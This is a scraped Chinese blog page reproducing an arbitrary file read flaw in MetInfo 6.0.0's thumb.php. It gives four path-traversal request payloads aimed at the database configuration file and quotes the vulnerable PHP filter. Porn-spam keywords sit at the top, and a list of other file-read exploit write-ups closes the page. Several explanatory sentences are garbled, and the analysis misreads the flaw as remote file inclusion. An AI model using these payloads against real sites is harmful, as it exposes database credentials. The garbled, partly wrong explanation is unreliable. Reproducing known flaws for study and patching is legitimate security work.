国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

漏洞點(diǎn)為/include/thumb.php

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn),信息與通信,安全,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

一測(cè):/include/thumb.php?dir=..././http/..././config/config_db.php

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn),信息與通信,安全,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

二測(cè):/include/thumb.php?dir=.....///http/.....///config/config_db.php

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn),信息與通信,安全,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

三測(cè):/include/thumb.php?dir=http/.....///.....///config/config_db.php

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn),信息與通信,安全,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

四測(cè):/include/thumb.php?dir=http\..\..\config\config_db.php

metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn),信息與通信,安全,網(wǎng)絡(luò),服務(wù)器,運(yùn)維

注意:此POC?僅適用于Windows?系統(tǒng),Linux?下無(wú)效

$dir?= str_replace(array('../','./'), '',?$_GET['dir']);

if(substr(str_replace($_M['url']['site'], '',?$dir),0,4) == 'http' && strpos($dir, './') === false){

header("Content-type:?image/jpeg");

ob_start();

readfile($dir);

ob_flush();

flush();

????????????die;

}

這段代碼的主要任務(wù)是從GET參數(shù)dir中獲取圖片資源并顯示出來(lái),但在安全防護(hù)方面存在一些問(wèn)題。
首先,它嘗試通過(guò)刪除用戶輸入中的?'../'?和?'./'?字符串來(lái)阻止基本的路徑遍歷攻擊。但是這種方法并不能完全避免所有類型的路徑遍歷漏洞,因?yàn)楣粽呖赡苁褂闷渌绞嚼@過(guò)這些過(guò)濾規(guī)則。
其次,代碼檢查了?$dir?是否以?'http://'?或?'https://'?開(kāi)頭,并且不包含?'./'?字符。這么做是想防止遠(yuǎn)程文件包含(RFI)攻擊的發(fā)生,即不讓網(wǎng)站從互聯(lián)網(wǎng)上的遠(yuǎn)程URL加載和執(zhí)行文件。然而,僅僅依賴于這兩個(gè)條件判斷并不足以確保安全性,因?yàn)楣粽呖赡苡修k法繞過(guò)這種限制。
具體來(lái)說(shuō):
substr(str_replace($_M['url']['site'],?'',?$dir),0,4)?這行代碼的作用是從經(jīng)過(guò)處理的?$dir?字符串中取出前四個(gè)字符,看它們是否等于?'http'。如果?$dir?指向的是一個(gè)URL,并且該URL是以?'http://'?或?'https://'?開(kāi)始的,那么這一部分將返回?'http'。
strpos($dir,?'./')?===?false?判斷?$dir?中是否沒(méi)有?'./'?字符串。如果沒(méi)有,則表達(dá)式為真。
當(dāng)上述兩個(gè)條件都滿足時(shí),意味著?$dir?指向的是一個(gè)不包含?'./'?的遠(yuǎn)程網(wǎng)址。
最后,若這兩個(gè)條件均滿足,程序會(huì)直接輸出請(qǐng)求的資源內(nèi)容,并將其響應(yīng)類型設(shè)置為?image/jpeg,即認(rèn)為它是一個(gè)JPEG格式的圖片文件。但這樣做實(shí)際上是允許了遠(yuǎn)程文件包含,而不是阻止它,從而留下了安全隱患。
文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-807813.html

到了這里,關(guān)于metinfo_6.0.0 任意文件讀取漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 任意文件讀取和漏洞復(fù)現(xiàn)

    任意文件讀取和漏洞復(fù)現(xiàn)

    一些網(wǎng)站的需求,可能會(huì)提供文件查看與下載的功能。如果對(duì)用戶查看或下載的文件沒(méi)有限制或者限制繞過(guò),就可以查看或下載任意文件。這些文件可以是漂代碼文件,配置文件,敏感文件等等。 任意文件讀取會(huì)造成(敏感)信息泄露: 任意文件讀取大多數(shù)情況是由于其他

    2024年02月09日
    瀏覽(20)
  • 任意文件讀取及漏洞復(fù)現(xiàn)

    任意文件讀取及漏洞復(fù)現(xiàn)

    一些網(wǎng)站的需求,可能會(huì)提供文件查看與下載的功能。如果對(duì)用戶查看或下載的文件沒(méi)有限制或者限制繞過(guò),就可以查看或下載任意文件。這些文件可以是源代碼文件,配置文件,敏感文件等等。 任意文件讀取會(huì)造成(敏感)信息泄露: 任意文件讀取很多情況是由于其他漏

    2024年02月09日
    瀏覽(24)
  • 【漏洞復(fù)現(xiàn)】OfficeWeb365 Indexs 任意文件讀取漏洞

    【漏洞復(fù)現(xiàn)】OfficeWeb365 Indexs 任意文件讀取漏洞

    OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過(guò)獨(dú)特的加密方式對(duì)payload進(jìn)行加密,讀取任意文件,獲取服務(wù)器敏感信息,使系統(tǒng)處于極不安全的狀態(tài)。 FOFA:body=\\\"請(qǐng)輸入furl參數(shù)\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 讀取文件加密方式

    2024年02月02日
    瀏覽(40)
  • Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 是 Jenkins 內(nèi)置的命令行頁(yè)面。 Jenkins 受影響版本中使用 args4j 庫(kù)解析CLI命令參數(shù),該庫(kù)默認(rèn)將參數(shù)中 @ 字符后的文件路徑替換為文件內(nèi)容,未授權(quán)的攻擊者可利用該特性使用 Jenkins 控制器進(jìn)程的默認(rèn)字符編碼讀取 Jenkins 控制器文件系統(tǒng)上的任意文件(如加密密鑰的二進(jìn)

    2024年02月22日
    瀏覽(26)
  • OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。 OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過(guò)獨(dú)特

    2024年02月03日
    瀏覽(38)
  • 漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗(yàn)分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)

    2024年01月18日
    瀏覽(32)
  • officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過(guò)獨(dú)特

    2024年02月20日
    瀏覽(28)
  • 用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    ?用友NC是一款企業(yè)級(jí)ERP軟件。作為一種信息化管理工具,用友NC提供了一系列業(yè)務(wù)管理模塊,包括財(cái)務(wù)會(huì)計(jì)、采購(gòu)管理、銷售管理、物料管理、生產(chǎn)計(jì)劃和人力資源管理等,幫助企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型和高效管理。 用友NC 系統(tǒng)word.docx等接口存在任意文件讀取漏洞,未經(jīng)身份認(rèn)證

    2024年01月25日
    瀏覽(22)
  • IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    ?IP-guard是由溢信科技股份有限公司開(kāi)發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 由于IP-guard WebServer?/ipg/static/appr/lib/flexpaper/php/view.php接口處未對(duì)用戶輸入的數(shù)據(jù)進(jìn)行嚴(yán)格的校驗(yàn)和過(guò)濾。未經(jīng)身份驗(yàn)證的攻擊者可

    2024年04月12日
    瀏覽(19)
  • 【漏洞復(fù)現(xiàn)】泛微e-office OfficeServer2.php 存在任意文件讀取漏洞復(fù)現(xiàn)

    泛微e-office OfficeServer2.php 存在任意文件讀取漏洞,攻擊者可通過(guò)構(gòu)造特定Payload獲取敏感數(shù)據(jù)信息。 請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果

    2024年02月09日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包